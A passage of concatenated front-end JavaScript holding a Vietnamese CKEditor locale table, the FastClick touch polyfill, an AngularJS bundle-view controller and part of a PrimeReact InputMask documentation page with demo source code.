trước","insertAfter":"Chèn hàng phía sau","deleteRow":"Xoá hàng"},"rows":"Số hàng","summary":"Tóm lược","title":"Thuộc tính bảng","toolbar":"Bảng","widthPc":"Phần trăm (%)","widthPx":"Điểm ảnh (px)","widthUnit":"Đơn vị"},"undo":{"redo":"Làm lại thao tác","undo":"Khôi phục thao tác"},"wsc":{"btnIgnore":"Bỏ qua","btnIgnoreAll":"Bỏ qua tất cả","btnReplace":"Thay thế","btnReplaceAll":"Thay thế tất cả","btnUndo":"Phục hồi lại","changeTo":"Chuyển thành","errorLoading":"Lỗi khi đang nạp dịch vụ ứng dụng: %s.","ieSpellDownload":"Chức năng kiểm tra chính tả chưa được cài đặt. Bạn có muốn tải về ngay bây giờ?","manyChanges":"Hoàn tất kiểm tra chính tả: %1 từ đã được thay đổi","noChanges":"Hoàn tất kiểm tra chính tả: Không có từ nào được thay đổi","noMispell":"Hoàn tất kiểm tra chính tả: Không có lỗi chính tả","noSuggestions":"- Không đưa ra gợi ý về từ -","notAvailable":"Xin lỗi, dịch vụ này hiện tại không có.","notInDic":"Không có trong từ điển","oneChange":"Hoàn tất kiểm tra chính tả: Một từ đã được thay đổi","progress":"Đang tiến hành kiểm tra chính tả...","title":"Kiểm tra chính tả","toolbar":"Kiểm tra chính tả"}};
;(function () { 'use strict'; /** * @preserve FastClick: polyfill to remove click delays on browsers with touch UIs. * * @codingstandard ftlabs-jsv2 * @copyright The Financial Times Limited [All Rights Reserved] * @license MIT License (see LICENSE.txt) */ /*jslint browser:true, node:true*/ /*global define, Event, Node*/ /** * Instantiate fast-clicking listeners on the specified layer. * * @constructor * @param {Element} layer The layer to listen on * @param {Object} [options={}] The options to override the defaults */ function FastClick(layer, options) { var oldOnClick; options = options || {}; /** * Whether a click is currently being tracked. * * @type boolean */ this.trackingClick = false; /** * Timestamp for when click tracking started. * * @type number */ this.trackingClickStart = 0; /** * The element being tracked for a click. * * @type EventTarget */ this.targetElement = null; /** * X-coordinate of touch start event. * * @type number */ this.touchStartX = 0; /** * Y-coordinate of touch start event. * * @type number */ this.touchStartY = 0; /** * ID of the last touch, retrieved from Touch.identifier. * * @type number */ this.lastTouchIdentifier = 0; /** * Touchmove boundary, beyond which a click will be cancelled. * * @type number */ this.touchBoundary = options.touchBoundary || 10; /** * The FastClick layer. * * @type Element */ this.layer = layer; /** * The minimum time between tap(touchstart and touchend) events * * @type number */ this.tapDelay = options.tapDelay || 200; /** * The maximum time for a tap * * @type number */ this.tapTimeout = options.tapTimeout || 700; /** * A node to exclude based on className. Alternative to manually applying needsclick. * * @type string */ this.excludeNode = options.excludeNode || null; if (FastClick.notNeeded(layer)) { return; } // Some old versions of Android don't have Function.prototype.bind function bind(method, context) { return function() { return method.apply(context, arguments); }; } var methods = ['onMouse', 'onClick', 'onTouchStart', 'onTouchMove', 'onTouchEnd', 'onTouchCancel']; var context = this; for (var i = 0, l = methods.length; i < l; i++) { context[methods[i]] = bind(context[methods[i]], context); } // Set up event handlers as required if (deviceIsAndroid) { layer.addEventListener('mouseover', this.onMouse, true); layer.addEventListener('mousedown', this.onMouse, true); layer.addEventListener('mouseup', this.onMouse, true); } layer.addEventListener('click', this.onClick, true); layer.addEventListener('touchstart', this.onTouchStart, false); layer.addEventListener('touchmove', this.onTouchMove, false); layer.addEventListener('touchend', this.onTouchEnd, false); layer.addEventListener('touchcancel', this.onTouchCancel, false); // Hack is required for browsers that don't support Event#stopImmediatePropagation (e.g. Android 2) // which is how FastClick normally stops click events bubbling to callbacks registered on the FastClick // layer when they are cancelled. if (!Event.prototype.stopImmediatePropagation) { layer.removeEventListener = function(type, callback, capture) { var rmv = Node.prototype.removeEventListener; if (type === 'click') { rmv.call(layer, type, callback.hijacked || callback, capture); } else { rmv.call(layer, type, callback, capture); } }; layer.addEventListener = function(type, callback, capture) { var adv = Node.prototype.addEventListener; if (type === 'click') { adv.call(layer, type, callback.hijacked || (callback.hijacked = function(event) { if (!event.propagationStopped) { callback(event); } }), capture); } else { adv.call(layer, type, callback, capture); } }; } // If a handler is already declared in the element's onclick attribute, it will be fired before // FastClick's onClick handler. Fix this by pulling out the user-defined handler function and // adding it as listener. if (typeof layer.onclick === 'function') { // Android browser on at least 3.2 requires a new reference to the function in layer.onclick // - the old one won't work if passed to addEventListener directly. oldOnClick = layer.onclick; layer.addEventListener('click', function(event) { oldOnClick(event); }, false); layer.onclick = null; } } /** * Windows Phone 8.1 fakes user agent string to look like Android and iPhone. * * @type boolean */ var deviceIsWindowsPhone = navigator.userAgent.indexOf("Windows Phone") >= 0; /** * Android requires exceptions. * * @type boolean */ var deviceIsAndroid = navigator.userAgent.indexOf('Android') > 0 && !deviceIsWindowsPhone; /** * iOS requires exceptions. * * @type boolean */ var deviceIsIOS = /iP(ad|hone|od)/.test(navigator.userAgent) && !deviceIsWindowsPhone; /** * iOS 4 requires an exception for select elements. * * @type boolean */ var deviceIsIOS4 = deviceIsIOS && (/OS 4_\d(_\d)?/).test(navigator.userAgent); /** * iOS 6.0-7.* requires the target element to be manually derived * * @type boolean */ var deviceIsIOSWithBadTarget = deviceIsIOS && (/OS [6-7]_\d/).test(navigator.userAgent); /** * BlackBerry requires exceptions. * * @type boolean */ var deviceIsBlackBerry10 = navigator.userAgent.indexOf('BB10') > 0; /** * Determine whether a given element requires a native click. * * @param {EventTarget|Element} target Target DOM element * @returns {boolean} Returns true if the element needs a native click */ FastClick.prototype.needsClick = function(target) { switch (target.nodeName.toLowerCase()) { // Don't send a synthetic click to disabled inputs (issue #62) case 'button': case 'select': case 'textarea': if (target.disabled) { return true; } break; case 'input': // File inputs need real clicks on iOS 6 due to a browser bug (issue #68) if ((deviceIsIOS && target.type === 'file') || target.disabled) { return true; } break; case 'label': case 'iframe': // iOS8 homescreen apps can prevent events bubbling into frames case 'video': return true; } return ((/\bneedsclick\b/).test(target.className) || (new RegExp(this.excludeNode).test(target.className))); }; /** * Determine whether a given element requires a call to focus to simulate click into element. * * @param {EventTarget|Element} target Target DOM element * @returns {boolean} Returns true if the element requires a call to focus to simulate native click. */ FastClick.prototype.needsFocus = function(target) { switch (target.nodeName.toLowerCase()) { case 'textarea': return true; case 'select': return !deviceIsAndroid; case 'input': switch (target.type) { case 'button': case 'checkbox': case 'file': case 'image': case 'radio': case 'submit': return false; } // No point in attempting to focus disabled inputs return !target.disabled && !target.readOnly; default: return (/\bneedsfocus\b/).test(target.className); } }; /** * Send a click event to the specified element. * * @param {EventTarget|Element} targetElement * @param {Event} event */ FastClick.prototype.sendClick = function(targetElement, event) { var clickEvent, touch; // On some Android devices activeElement needs to be blurred otherwise the synthetic click will have no effect (#24) if (document.activeElement && document.activeElement !== targetElement) { document.activeElement.blur(); } touch = event.changedTouches[0]; // Synthesise a click event, with an extra attribute so it can be tracked clickEvent = document.createEvent('MouseEvents'); clickEvent.initMouseEvent(this.determineEventType(targetElement), true, true, window, 1, touch.screenX, touch.screenY, touch.clientX, touch.clientY, false, false, false, false, 0, null); clickEvent.forwardedTouchEvent = true; targetElement.dispatchEvent(clickEvent); }; FastClick.prototype.determineEventType = function(targetElement) { //Issue #159: Android Chrome Select Box does not open with a synthetic click event if (deviceIsAndroid && targetElement.tagName.toLowerCase() === 'select') { return 'mousedown'; } return 'click'; }; /** * @param {EventTarget|Element} targetElement */ FastClick.prototype.focus = function(targetElement) { var length; // Issue #160: on iOS 7, some input elements (e.g. date datetime month) throw a vague TypeError on setSelectionRange. These elements don't have an integer value for the selectionStart and selectionEnd properties, but unfortunately that can't be used for detection because accessing the properties also throws a TypeError. Just check the type instead. Filed as Apple bug #15122724. if (deviceIsIOS && targetElement.setSelectionRange && targetElement.type.indexOf('date') !== 0 && targetElement.type !== 'time' && targetElement.type !== 'month') { length = targetElement.value.length; targetElement.setSelectionRange(length, length); } else { targetElement.focus(); } }; /** * Check whether the given target element is a child of a scrollable layer and if so, set a flag on it. * * @param {EventTarget|Element} targetElement */ FastClick.prototype.updateScrollParent = function(targetElement) { var scrollParent, parentElement; scrollParent = targetElement.fastClickScrollParent; // Attempt to discover whether the target element is contained within a scrollable layer. Re-check if the // target element was moved to another parent. if (!scrollParent || !scrollParent.contains(targetElement)) { parentElement = targetElement; do { if (parentElement.scrollHeight > parentElement.offsetHeight) { scrollParent = parentElement; targetElement.fastClickScrollParent = parentElement; break; } parentElement = parentElement.parentElement; } while (parentElement); } // Always update the scroll top tracker if possible. if (scrollParent) { scrollParent.fastClickLastScrollTop = scrollParent.scrollTop; } }; /** * @param {EventTarget} targetElement * @returns {Element|EventTarget} */ FastClick.prototype.getTargetElementFromEventTarget = function(eventTarget) { // On some older browsers (notably Safari on iOS 4.1 - see issue #56) the event target may be a text node. if (eventTarget.nodeType === Node.TEXT_NODE) { return eventTarget.parentNode; } return eventTarget; }; /** * On touch start, record the position and scroll offset. * * @param {Event} event * @returns {boolean} */ FastClick.prototype.onTouchStart = function(event) { var targetElement, touch, selection; // Ignore multiple touches, otherwise pinch-to-zoom is prevented if both fingers are on the FastClick element (issue #111). if (event.targetTouches.length > 1) { return true; } targetElement = this.getTargetElementFromEventTarget(event.target); touch = event.targetTouches[0]; if (deviceIsIOS) { // Only trusted events will deselect text on iOS (issue #49) selection = window.getSelection(); if (selection.rangeCount && !selection.isCollapsed) { return true; } if (!deviceIsIOS4) { // Weird things happen on iOS when an alert or confirm dialog is opened from a click event callback (issue #23): // when the user next taps anywhere else on the page, new touchstart and touchend events are dispatched // with the same identifier as the touch event that previously triggered the click that triggered the alert. // Sadly, there is an issue on iOS 4 that causes some normal touch events to have the same identifier as an // immediately preceeding touch event (issue #52), so this fix is unavailable on that platform. // Issue 120: touch.identifier is 0 when Chrome dev tools 'Emulate touch events' is set with an iOS device UA string, // which causes all touch events to be ignored. As this block only applies to iOS, and iOS identifiers are always long, // random integers, it's safe to to continue if the identifier is 0 here. if (touch.identifier && touch.identifier === this.lastTouchIdentifier) { event.preventDefault(); return false; } this.lastTouchIdentifier = touch.identifier; // If the target element is a child of a scrollable layer (using -webkit-overflow-scrolling: touch) and: // 1) the user does a fling scroll on the scrollable layer // 2) the user stops the fling scroll with another tap // then the event.target of the last 'touchend' event will be the element that was under the user's finger // when the fling scroll was started, causing FastClick to send a click event to that layer - unless a check // is made to ensure that a parent layer was not scrolled before sending a synthetic click (issue #42). this.updateScrollParent(targetElement); } } this.trackingClick = true; this.trackingClickStart = event.timeStamp; this.targetElement = targetElement; this.touchStartX = touch.pageX; this.touchStartY = touch.pageY; // Prevent phantom clicks on fast double-tap (issue #36) if ((event.timeStamp - this.lastClickTime) < this.tapDelay) { event.preventDefault(); } return true; }; /** * Based on a touchmove event object, check whether the touch has moved past a boundary since it started. * * @param {Event} event * @returns {boolean} */ FastClick.prototype.touchHasMoved = function(event) { var touch = event.changedTouches[0], boundary = this.touchBoundary; if (Math.abs(touch.pageX - this.touchStartX) > boundary || Math.abs(touch.pageY - this.touchStartY) > boundary) { return true; } return false; }; /** * Update the last position. * * @param {Event} event * @returns {boolean} */ FastClick.prototype.onTouchMove = function(event) { if (!this.trackingClick) { return true; } // If the touch has moved, cancel the click tracking if (this.targetElement !== this.getTargetElementFromEventTarget(event.target) || this.touchHasMoved(event)) { this.trackingClick = false; this.targetElement = null; } return true; }; /** * Attempt to find the labelled control for the given label element. * * @param {EventTarget|HTMLLabelElement} labelElement * @returns {Element|null} */ FastClick.prototype.findControl = function(labelElement) { // Fast path for newer browsers supporting the HTML5 control attribute if (labelElement.control !== undefined) { return labelElement.control; } // All browsers under test that support touch events also support the HTML5 htmlFor attribute if (labelElement.htmlFor) { return document.getElementById(labelElement.htmlFor); } // If no for attribute exists, attempt to retrieve the first labellable descendant element // the list of which is defined here: http://www.w3.org/TR/html5/forms.html#category-label return labelElement.querySelector('button, input:not([type=hidden]), keygen, meter, output, progress, select, textarea'); }; /** * On touch end, determine whether to send a click event at once. * * @param {Event} event * @returns {boolean} */ FastClick.prototype.onTouchEnd = function(event) { var forElement, trackingClickStart, targetTagName, scrollParent, touch, targetElement = this.targetElement; if (!this.trackingClick) { return true; } // Prevent phantom clicks on fast double-tap (issue #36) if ((event.timeStamp - this.lastClickTime) < this.tapDelay) { this.cancelNextClick = true; return true; } if ((event.timeStamp - this.trackingClickStart) > this.tapTimeout) { return true; } // Reset to prevent wrong click cancel on input (issue #156). this.cancelNextClick = false; this.lastClickTime = event.timeStamp; trackingClickStart = this.trackingClickStart; this.trackingClick = false; this.trackingClickStart = 0; // On some iOS devices, the targetElement supplied with the event is invalid if the layer // is performing a transition or scroll, and has to be re-detected manually. Note that // for this to function correctly, it must be called *after* the event target is checked! // See issue #57; also filed as rdar://13048589 . if (deviceIsIOSWithBadTarget) { touch = event.changedTouches[0]; // In certain cases arguments of elementFromPoint can be negative, so prevent setting targetElement to null targetElement = document.elementFromPoint(touch.pageX - window.pageXOffset, touch.pageY - window.pageYOffset) || targetElement; targetElement.fastClickScrollParent = this.targetElement.fastClickScrollParent; } targetTagName = targetElement.tagName.toLowerCase(); if (targetTagName === 'label') { forElement = this.findControl(targetElement); if (forElement) { this.focus(targetElement); if (deviceIsAndroid) { return false; } targetElement = forElement; } } else if (this.needsFocus(targetElement)) { // Case 1: If the touch started a while ago (best guess is 100ms based on tests for issue #36) then focus will be triggered anyway. Return early and unset the target element reference so that the subsequent click will be allowed through. // Case 2: Without this exception for input elements tapped when the document is contained in an iframe, then any inputted text won't be visible even though the value attribute is updated as the user types (issue #37). if ((event.timeStamp - trackingClickStart) > 100 || (deviceIsIOS && window.top !== window && targetTagName === 'input')) { this.targetElement = null; return false; } this.focus(targetElement); this.sendClick(targetElement, event); // Select elements need the event to go through on iOS 4, otherwise the selector menu won't open. // Also this breaks opening selects when VoiceOver is active on iOS6, iOS7 (and possibly others) if (!deviceIsIOS || targetTagName !== 'select') { this.targetElement = null; event.preventDefault(); } return false; } if (deviceIsIOS && !deviceIsIOS4) { // Don't send a synthetic click event if the target element is contained within a parent layer that was scrolled // and this tap is being used to stop the scrolling (usually initiated by a fling - issue #42). scrollParent = targetElement.fastClickScrollParent; if (scrollParent && scrollParent.fastClickLastScrollTop !== scrollParent.scrollTop) { return true; } } // Prevent the actual click from going though - unless the target node is marked as requiring // real clicks or if it is in the whitelist in which case only non-programmatic clicks are permitted. if (!this.needsClick(targetElement)) { event.preventDefault(); this.sendClick(targetElement, event); } return false; }; /** * On touch cancel, stop tracking the click. * * @returns {void} */ FastClick.prototype.onTouchCancel = function() { this.trackingClick = false; this.targetElement = null; }; /** * Determine mouse events which should be permitted. * * @param {Event} event * @returns {boolean} */ FastClick.prototype.onMouse = function(event) { // If a target element was never set (because a touch event was never fired) allow the event if (!this.targetElement) { return true; } if (event.forwardedTouchEvent) { return true; } // Programmatically generated events targeting a specific element should be permitted if (!event.cancelable) { return true; } // Derive and check the target element to see whether the mouse event needs to be permitted; // unless explicitly enabled, prevent non-touch click events from triggering actions, // to prevent ghost/doubleclicks. if (!this.needsClick(this.targetElement) || this.cancelNextClick) { // Prevent any user-added listeners declared on FastClick element from being fired. if (event.stopImmediatePropagation) { event.stopImmediatePropagation(); } else { // Part of the hack for browsers that don't support Event#stopImmediatePropagation (e.g. Android 2) event.propagationStopped = true; } // Cancel the event event.stopPropagation(); event.preventDefault(); return false; } // If the mouse event is permitted, return true for the action to go through. return true; }; /** * On actual clicks, determine whether this is a touch-generated click, a click action occurring * naturally after a delay after a touch (which needs to be cancelled to avoid duplication), or * an actual click which should be permitted. * * @param {Event} event * @returns {boolean} */ FastClick.prototype.onClick = function(event) { var permitted; // It's possible for another FastClick-like library delivered with third-party code to fire a click event before FastClick does (issue #44). In that case, set the click-tracking flag back to false and return early. This will cause onTouchEnd to return early. if (this.trackingClick) { this.targetElement = null; this.trackingClick = false; return true; } // Very odd behaviour on iOS (issue #18): if a submit element is present inside a form and the user hits enter in the iOS simulator or clicks the Go button on the pop-up OS keyboard the a kind of 'fake' click event will be triggered with the submit-type input element as the target. if (event.target.type === 'submit' && event.detail === 0) { return true; } permitted = this.onMouse(event); // Only unset targetElement if the click is not permitted. This will ensure that the check for !targetElement in onMouse fails and the browser's click doesn't go through. if (!permitted) { this.targetElement = null; } // If clicks are permitted, return true for the action to go through. return permitted; }; /** * Remove all FastClick's event listeners. * * @returns {void} */ FastClick.prototype.destroy = function() { var layer = this.layer; if (deviceIsAndroid) { layer.removeEventListener('mouseover', this.onMouse, true); layer.removeEventListener('mousedown', this.onMouse, true); layer.removeEventListener('mouseup', this.onMouse, true); } layer.removeEventListener('click', this.onClick, true); layer.removeEventListener('touchstart', this.onTouchStart, false); layer.removeEventListener('touchmove', this.onTouchMove, false); layer.removeEventListener('touchend', this.onTouchEnd, false); layer.removeEventListener('touchcancel', this.onTouchCancel, false); }; /** * Check whether FastClick is needed. * * @param {Element} layer The layer to listen on */ FastClick.notNeeded = function(layer) { var metaViewport; var chromeVersion; var blackberryVersion; var firefoxVersion; // Devices that don't support touch don't need FastClick if (typeof window.ontouchstart === 'undefined') { return true; } // Chrome version - zero for other browsers chromeVersion = +(/Chrome\/([0-9]+)/.exec(navigator.userAgent) || [,0])[1]; if (chromeVersion) { if (deviceIsAndroid) { metaViewport = document.querySelector('meta[name=viewport]'); if (metaViewport) { // Chrome on Android with user-scalable="no" doesn't need FastClick (issue #89) if (metaViewport.content.indexOf('user-scalable=no') !== -1) { return true; } // Chrome 32 and above with width=device-width or less don't need FastClick if (chromeVersion > 31 && document.documentElement.scrollWidth <= window.outerWidth) { return true; } } // Chrome desktop doesn't need FastClick (issue #15) } else { return true; } } if (deviceIsBlackBerry10) { blackberryVersion = navigator.userAgent.match(/Version\/([0-9]*)\.([0-9]*)/); // BlackBerry 10.3+ does not require Fastclick library. // https://github.com/ftlabs/fastclick/issues/251 if (blackberryVersion[1] >= 10 && blackberryVersion[2] >= 3) { metaViewport = document.querySelector('meta[name=viewport]'); if (metaViewport) { // user-scalable=no eliminates click delay. if (metaViewport.content.indexOf('user-scalable=no') !== -1) { return true; } // width=device-width (or less than device-width) eliminates click delay. if (document.documentElement.scrollWidth <= window.outerWidth) { return true; } } } } // IE10 with -ms-touch-action: none or manipulation, which disables double-tap-to-zoom (issue #97) if (layer.style.msTouchAction === 'none' || layer.style.touchAction === 'manipulation') { return true; } // Firefox version - zero for other browsers firefoxVersion = +(/Firefox\/([0-9]+)/.exec(navigator.userAgent) || [,0])[1]; if (firefoxVersion >= 27) { // Firefox 27+ does not have tap delay if the content is not zoomable - https://bugzilla.mozilla.org/show_bug.cgi?id=922896 metaViewport = document.querySelector('meta[name=viewport]'); if (metaViewport && (metaViewport.content.indexOf('user-scalable=no') !== -1 || document.documentElement.scrollWidth <= window.outerWidth)) { return true; } } // IE11: prefixed -ms-touch-action is no longer supported and it's recomended to use non-prefixed version // http://msdn.microsoft.com/en-us/library/windows/apps/Hh767313.aspx if (layer.style.touchAction === 'none' || layer.style.touchAction === 'manipulation') { return true; } return false; }; /** * Factory method for creating a FastClick object * * @param {Element} layer The layer to listen on * @param {Object} [options={}] The options to override the defaults */ FastClick.attach = function(layer, options) { return new FastClick(layer, options); }; if (typeof define === 'function' && typeof define.amd === 'object' && define.amd) { // AMD. Register as an anonymous module. define(function() { return FastClick; }); } else if (typeof module !== 'undefined' && module.exports) { module.exports = FastClick.attach; module.exports.FastClick = FastClick; } else { window.FastClick = FastClick; } }());
angular.module('das') .config(['$stateProvider', function($stateProvider) { $stateProvider .state('bundle/view', { url: "/bundle/view/:slug?preview", templateUrl: "pages/bundle/view.html", controller: "bundleViewController as bundleViewCtrl", resolve: { currentUser: ['$stateParams', '$q', 'Users', function($stateParams, $q, Users) { var deferred = $q.defer(); Users.me().$promise.then(function(user) { deferred.resolve(user); }, function(err) { deferred.resolve(null); }); return deferred.promise; }], preview: ['$stateParams', function($stateParams) { return typeof $stateParams.preview === undefined ? 0 : $stateParams.preview; }], bundle: ['$stateParams', '$q', 'Bundles', function($stateParams, $q, Bundles) { var deferred = $q.defer(); Bundles.getBySlug({slug: $stateParams.slug}).$promise.then(function(bundle) { deferred.resolve(bundle); }, function(err) { deferred.resolve(null); }); return deferred.promise; }] } }); }]); angular.module('das.controllers') .controller('bundleViewController', ['$rootScope', '$scope', '$state', '$routeParams', '$timeout', 'BundleDataService', 'currentUser', 'preview', 'bundle', 'BUNDLE_STATUS', function ($rootScope, $scope, $state, $routeParams, $timeout, BundleDataService, currentUser, preview, bundle, BUNDLE_STATUS) { // if(currentUser === null) { // $state.go('landing'); // return; // } if(bundle == null) { $state.go('home'); return; } $rootScope.siteParams.clearHookers(); $rootScope.siteParams.buttonBack.show = currentUser !== null; $rootScope.siteParams.buttonBack.url = 'home'; $rootScope.siteParams.buttonMenu.show = false; $rootScope.siteParams.isMenu = false; $rootScope.siteParams.buttonCloseMenu.show = currentUser !== null; var init = function() { $scope.bundle = bundle; $scope.preview = preview; $scope.currentUser = currentUser; $scope.BUNDLE_STATUS = BUNDLE_STATUS; $scope.showBundleOverlay = bundle.status == BUNDLE_STATUS.DRAFTED; if($scope.showBundleOverlay) { $timeout(function() { }); } $scope.afterRenderBundlePreview = function() { angular.element('.bundle-overlay').css('height', (angular.element('.page-container').height() + 50) + 'px'); angular.element('.guide-desc').css('top', angular.element('.btn-bundle-add-desc').offset().top + 'px'); angular.element('.btn-got-it').css('top', angular.element('.btn-bundle-add-desc').offset().top + angular.element('.btn-bundle-add-desc').height() + 'px'); }; $scope.bundleProblem = BundleDataService.getBundleProblem($scope.bundle); if($scope.bundleProblem != null && $scope.bundleProblem.type != 'FAILED_BUNDLE' && $scope.bundleProblem.type != 'EXPIRED_BUNDLE' && ($scope.currentUser == null || $scope.currentUser.id != $scope.bundle.UserId)) { $scope.bundleProblem = null; } $scope.hasContributed = $scope.currentUser != null && typeof (_.findWhere($scope.bundle.Contributions, {UserId: $scope.currentUser.id})) !== "undefined"; if(bundle.status === 0) { $rootScope.siteParams.clearHookers(); $rootScope.siteParams.registerBackButtonHooker(function() { $rootScope.bundle = bundle; $state.go('bundle/wizard', {step: 6}); return true; }); $rootScope.siteParams.registerCloseButtonHooker(function() { $state.go('bundle/delete', {slug:bundle.slug, step: 0}); return true; }); } else { $rootScope.siteParams.buttonCloseMenu.show = false; $rootScope.siteParams.buttonMenu.show = currentUser !== null; } }; $scope.getProgressDescription = function() { return BundleDataService.getProgressDescription($scope.bundle); }; $scope.onEditPhoto = function() { $state.go('bundle/edit/photo', {slug: $scope.bundle.slug}); }; $scope.onEditDesc = function() { $state.go('bundle/edit/desc', {slug: $scope.bundle.slug}); }; $scope.onMakeLive = function() { // $scope.bundle.status = BUNDLE_STATUS.LIVE; $scope.bundle.$live().then(function() { $state.go('bundle/live', {slug: $scope.bundle.slug}); }); }; $scope.onHideOverlay = function() { $scope.showBundleOverlay = false; }; $scope.onThumbnailClick = function() { }; $scope.onLoginRedirect = function() { $rootScope.loginRedirect = { url: 'bundle/view', params: {slug:$scope.bundle.slug}}; $state.go('landing'); }; $scope.onHideError= function() { $scope.bundleProblem = null; }; // $scope.onExtendBundle = function() { // $rootScope.bundle = bundle; // $state.go('bundle/wizard', {step: 2}); // }; $scope.$watch('bundle', function() { console.log($scope.bundle); }, true); init(); }]);
import React, { Component } from 'react'; import Link from 'next/link'; import { TabView, TabPanel } from '../../lib/tabview/TabView'; import { useLiveEditorTabs } from '../common/liveeditor'; import { CodeHighlight } from '../common/codehighlight'; export class InputMaskDoc extends Component { constructor(props) { super(props); this.sources = { 'class': { tabName: 'Class Source', content: ` import React, { Component } from 'react'; import { InputMask } from 'primereact/inputmask'; export class InputMaskDemo extends Component { constructor(props) { super(props); this.state = { val1: null, val2: null, val3: null, val4: null, val5: null, val6: null }; } render() { return ( <div> <div className="card"> <div className="p-fluid p-formgrid p-grid"> <div className="p-field p-col-12 p-md-4"> <label htmlFor="basic">Basic</label> <InputMask id="basic" mask="99-999999" value={this.state.val1} placeholder="99-999999" onChange={(e) => this.setState({val1: e.value})}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="ssn">SSN</label> <InputMask id="ssn" mask="999-99-9999" value={this.state.val2} placeholder="999-99-9999" onChange={(e) => this.setState({val2: e.value})}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="date">Date</label> <InputMask id="date" mask="99/99/9999" value={this.state.val3} placeholder="99/99/9999" slotChar="mm/dd/yyyy" onChange={(e) => this.setState({val3: e.value})}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phone">Phone</label> <InputMask id="phone" mask="(999) 999-9999" value={this.state.val4} placeholder="(999) 999-9999" onChange={(e) => this.setState({val4: e.value})}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phoneext">Phone Ext</label> <InputMask id="phoneext" mask="(999) 999-9999? x99999" value={this.state.val5} placeholder="(999) 999-9999? x99999" onChange={(e) => this.setState({val5: e.value})}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="serial">Serial</label> <InputMask id="serial" mask="a*-999-a999" value={this.state.val6} placeholder="a*-999-a999" onChange={(e) => this.setState({val6: e.value})}></InputMask> </div> </div> </div> </div> ); } } ` }, 'hooks': { tabName: 'Hooks Source', content: ` import React, { useState } from 'react'; import { InputMask } from 'primereact/inputmask'; const InputMaskDemo = () => { const [val1, setVal1] = useState(); const [val2, setVal2] = useState(); const [val3, setVal3] = useState(); const [val4, setVal4] = useState(); const [val5, setVal5] = useState(); const [val6, setVal6] = useState(); return ( <div> <div className="card"> <div className="p-fluid p-formgrid p-grid"> <div className="p-field p-col-12 p-md-4"> <label htmlFor="basic">Basic</label> <InputMask id="basic" mask="99-999999" value={val1} placeholder="99-999999" onChange={(e) => setVal1(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="ssn">SSN</label> <InputMask id="ssn" mask="999-99-9999" value={val2} placeholder="999-99-9999" onChange={(e) => setVal2(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="date">Date</label> <InputMask id="date" mask="99/99/9999" value={val3} placeholder="99/99/9999" slotChar="mm/dd/yyyy" onChange={(e) => setVal3(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phone">Phone</label> <InputMask id="phone" mask="(999) 999-9999" value={val4} placeholder="(999) 999-9999" onChange={(e) => setVal4(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phoneext">Phone Ext</label> <InputMask id="phoneext" mask="(999) 999-9999? x99999" value={val5} placeholder="(999) 999-9999? x99999" onChange={(e) => setVal5(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="serial">Serial</label> <InputMask id="serial" mask="a*-999-a999" value={val6} placeholder="a*-999-a999" onChange={(e) => setVal6(e.value)}></InputMask> </div> </div> </div> </div> ); } ` }, 'ts': { tabName: 'TS Source', content: ` import React, { useState } from 'react'; import { InputMask } from 'primereact/inputmask'; const InputMaskDemo = () => { const [val1, setVal1] = useState(); const [val2, setVal2] = useState(); const [val3, setVal3] = useState(); const [val4, setVal4] = useState(); const [val5, setVal5] = useState(); const [val6, setVal6] = useState(); return ( <div> <div className="card"> <div className="p-fluid p-formgrid p-grid"> <div className="p-field p-col-12 p-md-4"> <label htmlFor="basic">Basic</label> <InputMask id="basic" mask="99-999999" value={val1} placeholder="99-999999" onChange={(e) => setVal1(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="ssn">SSN</label> <InputMask id="ssn" mask="999-99-9999" value={val2} placeholder="999-99-9999" onChange={(e) => setVal2(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="date">Date</label> <InputMask id="date" mask="99/99/9999" value={val3} placeholder="99/99/9999" slotChar="mm/dd/yyyy" onChange={(e) => setVal3(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phone">Phone</label> <InputMask id="phone" mask="(999) 999-9999" value={val4} placeholder="(999) 999-9999" onChange={(e) => setVal4(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phoneext">Phone Ext</label> <InputMask id="phoneext" mask="(999) 999-9999? x99999" value={val5} placeholder="(999) 999-9999? x99999" onChange={(e) => setVal5(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="serial">Serial</label> <InputMask id="serial" mask="a*-999-a999" value={val6} placeholder="a*-999-a999" onChange={(e) => setVal6(e.value)}></InputMask> </div> </div> </div> </div> ); } ` }, 'browser': { tabName: 'Browser Source', imports: ` <script src="https://unpkg.com/primereact/core/core.min.js"></script> <script src="https://unpkg.com/primereact/inputmask/inputmask.min.js"></script>`, content: ` const { useEffect, useState } = React; const { InputMask } = primereact.inputmask; const InputMaskDemo = () => { const [val1, setVal1] = useState(); const [val2, setVal2] = useState(); const [val3, setVal3] = useState(); const [val4, setVal4] = useState(); const [val5, setVal5] = useState(); const [val6, setVal6] = useState(); return ( <div> <div className="card"> <div className="p-fluid p-formgrid p-grid"> <div className="p-field p-col-12 p-md-4"> <label htmlFor="basic">Basic</label> <InputMask id="basic" mask="99-999999" value={val1} placeholder="99-999999" onChange={(e) => setVal1(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="ssn">SSN</label> <InputMask id="ssn" mask="999-99-9999" value={val2} placeholder="999-99-9999" onChange={(e) => setVal2(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="date">Date</label> <InputMask id="date" mask="99/99/9999" value={val3} placeholder="99/99/9999" slotChar="mm/dd/yyyy" onChange={(e) => setVal3(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phone">Phone</label> <InputMask 